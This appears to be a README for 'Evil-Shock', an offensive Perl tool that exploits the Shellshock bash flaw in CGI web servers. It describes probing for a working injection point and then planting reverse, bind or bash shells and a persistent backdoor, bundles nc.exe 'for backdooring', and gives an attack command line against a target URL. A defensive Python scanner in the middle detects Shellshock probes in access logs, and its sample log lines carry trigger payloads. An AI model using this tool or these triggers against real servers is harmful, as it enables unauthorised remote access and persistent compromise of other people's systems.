Evil-Shock is a powerful tool made to exploit Shellshock. What's special about Evil-Shock is that it doesn't base its attack on a single command: another tool might inject a simple "echo Vulnerable" and check whether the server executes it, but in many cases the server won't execute that particular command while it will execute a different one ;) Evil-Shock first finds the command that does work, also known as the Injection Point, and then uses that injection point to execute further commands and gain remote access. So far, in its first version, Evil-Shock can check for 4 different Injection Points:
1 - NSLookup
2 - Echo
3 - LS
4 - Ping
In future versions more injection points will be added.
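The probes listed above leave a distinctive trace in the web server's access log. As an added example that is not part of Evil-Shock, the following Python scanner checks Apache/nginx combined-format log lines for the Shellshock function-definition prefix in the User-Agent and Referer headers and reports which of the four injection-point commands each probe carried; the log lines are constructed, and the CGI path /cgi-bin/menu is taken from the usage example further down.

```python
import re
from typing import List, Optional, Tuple

# Shellshock trigger in a header value: a function definition "() { ... }"
# followed by ";" and the command to run.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)")
# Probe commands an injection-point scan typically tries (the four listed above).
PROBE_CMDS = ("nslookup", "echo", "ls", "ping")
# Apache/nginx "combined" format; the last two quoted fields are Referer and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify_probe(header_value: str) -> Optional[str]:
    """Return the probe command a Shellshock header value tries to run,
    "other" for a trigger with an unrecognised command, or None if clean."""
    m = SHELLSHOCK_RE.search(header_value)
    if m is None:
        return None
    cmd = m.group("cmd")
    for probe in PROBE_CMDS:
        # Match the bare command or an absolute path such as /usr/bin/nslookup.
        if re.search(r"(^|[\s;/])" + probe + r"(\s|$)", cmd):
            return probe
    return "other"

def scan_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (client ip, request line, header, probe) for every line whose
    Referer or User-Agent carries a Shellshock trigger."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not combined format: skip rather than guess
        for header in ("ua", "ref"):
            probe = classify_probe(m.group(header))
            if probe is not None:
                hits.append((m.group("ip"), m.group("req"), header, probe))
    return hits

# Constructed sample lines: a normal request, an echo probe in the User-Agent,
# and an nslookup probe in the Referer.
LOG_LINES = [
    '10.0.0.5 - - [24/Sep/2014:10:01:02 +0000] "GET /cgi-bin/menu HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Sep/2014:10:01:07 +0000] "GET /cgi-bin/menu HTTP/1.1" 200 512 "-" "() { :;}; echo Vulnerable"',
    '10.0.0.9 - - [24/Sep/2014:10:01:09 +0000] "GET /cgi-bin/menu HTTP/1.1" 200 512 "() { :; }; /usr/bin/nslookup probe.example" "curl/7.38"',
]
for hit in scan_log(LOG_LINES):
    print("shellshock probe: ip=%s header=%s cmd=%s" % (hit[0], hit[2], hit[3]))
```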
I recommend downloading the ISO file from VulnHub and installing it in your favorite virtual machine manager: https://www.vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/ It was used to test and develop Evil-Shock!
Netcat normally doesn't exist for Windows, but I had a look into the Metasploit Windows libraries and they include an nc.exe program for backdooring. Please report any case of infection while using that nc.exe, thanks!
Linux and Windows! If running on Windows, make sure not to remove the nc file, since it contains the nc.exe which allows you to backdoor a server. On Linux make sure to have netcat installed.
WARNING: MY FIREWALL IS BLOCKING THE CONNECTION SO I CANNOT SHOW THE REVERSE SHELL, BUT IT SHOULD WORK FINE IN ANY OTHER CASE :)
Evil-Shock is equipped with some useful and interesting commands:
t|target= : This will set the target.
shell=<reverse / bind> : This will set the shell type.
p|port= : Port to open the shell on.
help : Print help menu.
inject= : This allows the user to inject a custom command into the web server.
user-agent= : When grabbing info you can choose a custom user-agent or use the default one.
srv-persistent : Only when a bind shell is selected and injected; this will then also inject a persistent backdoor.
inject-only : This will test the Injection Points only and not inject anything else.
Evil-Shock supports 3 different types of shell: reverse, bind and bash shells!
Reverse - The victim will connect back to you.
Bind - You will connect directly to the target (Recommended).
Bash (Reverse Only) - Rather than creating a netcat listener on the victim, a bash listener will be injected.
perl evilshock.pl -help
perl evilshock.pl -t=http://shellshock.site/cgi-bin/menu --shell=bind --port=1234 --srv-persistent

